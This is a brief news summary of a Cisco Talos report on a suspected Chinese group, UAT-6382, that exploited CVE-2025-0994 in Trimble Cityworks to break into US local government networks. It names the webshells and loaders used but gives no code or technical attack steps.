Cisco’s Talos threat intelligence team uncovered a campaign by a suspected Chinese threat group, UAT-6382, that exploited a critical vulnerability in Trimble Cityworks software before it was publicly patched. Cityworks is widely used by local governments and utilities to manage assets and work operations. The flaw, tracked as CVE-2025-0994, enabled remote code execution and affected Microsoft IIS servers used by the software.
The intrusions reportedly began in January, weeks before Trimble released a fix in early February.
Talos researchers said the attackers broke into US local government networks, conducted reconnaissance, searched for sensitive files, and deployed persistent malware tools. Their primary target appeared to be systems connected to utility management.
The hackers used a variety of tools including Chinese-language webshells like AntSword and Chopper, as well as TetraLoader, a Rust-based custom loader.
TetraLoader, built using the MaLoader framework, helped deploy known offensive tools such as Cobalt Strike and VShell for ongoing access. MaLoader itself emerged on GitHub in late 2024, signaling active development of custom malware in Chinese-speaking threat communities.
Talos attributed the campaign to a Chinese-speaking actor based on technical tools, behavior, and targets. Despite the availability of a patch, many vulnerable systems remained unprotected, allowing attackers to infiltrate and maintain access to sensitive US infrastructure. The campaign reflects a broader strategy to compromise public utilities through software supply chains and delayed patch adoption.
Reference:
